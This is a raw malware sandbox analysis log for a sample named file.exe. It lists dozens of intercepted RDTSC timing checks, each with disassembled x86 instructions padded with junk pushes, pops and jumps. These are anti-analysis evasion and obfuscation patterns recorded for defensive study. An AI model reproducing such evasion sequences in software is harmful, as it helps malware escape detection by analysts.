Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46B86 second address: D46BBC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D344F4ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F0D344F4ABCh 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F0D344F4ABBh 0x0000001b jng 00007F0D344F4ABCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D475F3 second address: D2EEE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dl, F4h 0x0000000c or dword ptr [ebp+122D2178h], eax 0x00000012 call dword ptr [ebp+1244A72Dh] 0x00000018 push edx 0x00000019 push eax 0x0000001a jg 00007F0D34B708F6h 0x00000020 pop eax 0x00000021 pop edx 0x00000022 jo 00007F0D34B70924h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0D34B708FAh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89D9A second address: D89DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F0D344F4AC9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89F07 second address: D89F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A045 second address: D8A04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A04B second address: D8A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A050 second address: D8A056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A1B2 second address: D8A1CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70905h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A480 second address: D8A484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A484 second address: D8A48E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D34B708F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A48E second address: D8A497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A497 second address: D8A4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A4A0 second address: D8A4C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jo 00007F0D344F4B08h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A4C9 second address: D8A4CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A4CF second address: D8A502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4AC2h 0x0000000d jmp 00007F0D344F4AC9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EC12 second address: D8EC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EC16 second address: D8EC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91AD6 second address: D91ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91ADE second address: D91B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F0D344F4AC2h 0x0000000b jmp 00007F0D344F4AC5h 0x00000010 pushad 0x00000011 jmp 00007F0D344F4AC9h 0x00000016 jmp 00007F0D344F4ABCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D93CBC second address: D93CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96C12 second address: D96C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96C18 second address: D96C28 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B70902h 0x00000008 jne 00007F0D34B708F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96C28 second address: D96C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96C32 second address: D96C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9AD22 second address: D9AD27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9AD27 second address: D9AD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F346 second address: D9F350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F490 second address: D9F4AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D34B708F6h 0x00000008 jmp 00007F0D34B708FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F0D34B708FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F5DB second address: D9F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F5E5 second address: D9F5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FA01 second address: D9FA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007F0D344F4AC0h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0D344F4AC1h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FA33 second address: D9FA37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FE0 second address: D46FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FE4 second address: D46FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FEE second address: D46FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FF2 second address: D46FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FF6 second address: D47066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F0D344F4AB8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D3594h] 0x00000028 mov ebx, dword ptr [ebp+12478038h] 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0D344F4AB8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D1800h], ebx 0x0000004e add eax, ebx 0x00000050 mov cx, dx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0D344F4ABAh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47066 second address: D47079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47079 second address: D47083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FBC3 second address: D9FBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FBC9 second address: D9FBFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0D344F4AC0h 0x0000000f jl 00007F0D344F4AB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FDB4 second address: D9FDD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70906h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5972 second address: DA5978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5978 second address: DA597E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA597E second address: DA5982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4D0F second address: DA4D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0D34B708F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E5B second address: DA4E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E61 second address: DA4E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E67 second address: DA4E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E6B second address: DA4E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E71 second address: DA4E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E80 second address: DA4ECD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0D34B70903h 0x00000011 jmp 00007F0D34B708FCh 0x00000016 jg 00007F0D34B708F6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0D34B70901h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5554 second address: DA555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC25E second address: DAC279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC521 second address: DAC527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC527 second address: DAC52D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC52D second address: DAC549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0D344F4AC4h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAD62E second address: DAD637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DADC03 second address: DADC19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D344F4AC2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DADC19 second address: DADC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5F59 second address: DB5F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5F5D second address: DB5F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5F6B second address: DB5F9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D344F4AD7h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F0D344F4AB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB62B4 second address: DB62BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6579 second address: DB6597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6597 second address: DB659F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB69E8 second address: DB6A09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC0h 0x00000007 je 00007F0D344F4AB8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6A09 second address: DB6A18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F0D34B708F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6BA7 second address: DB6BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4ABAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6BB5 second address: DB6BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D34B708FAh 0x00000008 jc 00007F0D34B708F6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jno 00007F0D34B7090Bh 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007F0D34B708F6h 0x00000022 jmp 00007F0D34B708FBh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6BFC second address: DB6C18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0D344F4AC1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6C18 second address: DB6C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E44 second address: DC1E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E4A second address: DC1E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E4E second address: DC1E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jng 00007F0D344F4ABAh 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E66 second address: DC1E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E6A second address: DC1E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4AC0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E84 second address: DC1E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E88 second address: DC1E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E8C second address: DC1E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0D34B708F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E9C second address: DC1EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1EA2 second address: DC1EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC03F3 second address: DC041B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F0D344F4AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jns 00007F0D344F4AB6h 0x00000017 pop edx 0x00000018 jmp 00007F0D344F4ABDh 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC041B second address: DC0423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC0593 second address: DC059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC0703 second address: DC074D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0D34B70906h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jnl 00007F0D34B708F6h 0x00000019 jbe 00007F0D34B708F6h 0x0000001f popad 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F0D34B70905h 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC0897 second address: DC08A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F0D344F4ABCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC08A4 second address: DC08B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F0D34B708F6h 0x0000000c js 00007F0D34B708F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC08B6 second address: DC08CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D344F4ABCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC08CF second address: DC08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC08D5 second address: DC08D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1D18 second address: DC1D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFAE9 second address: DBFAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFAED second address: DBFB0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F0D34B70909h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFB0C second address: DBFB31 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D344F4ABEh 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F0D344F4AB6h 0x00000010 jc 00007F0D344F4ABEh 0x00000016 jno 00007F0D344F4AB6h 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFB31 second address: DBFB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFB39 second address: DBFB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
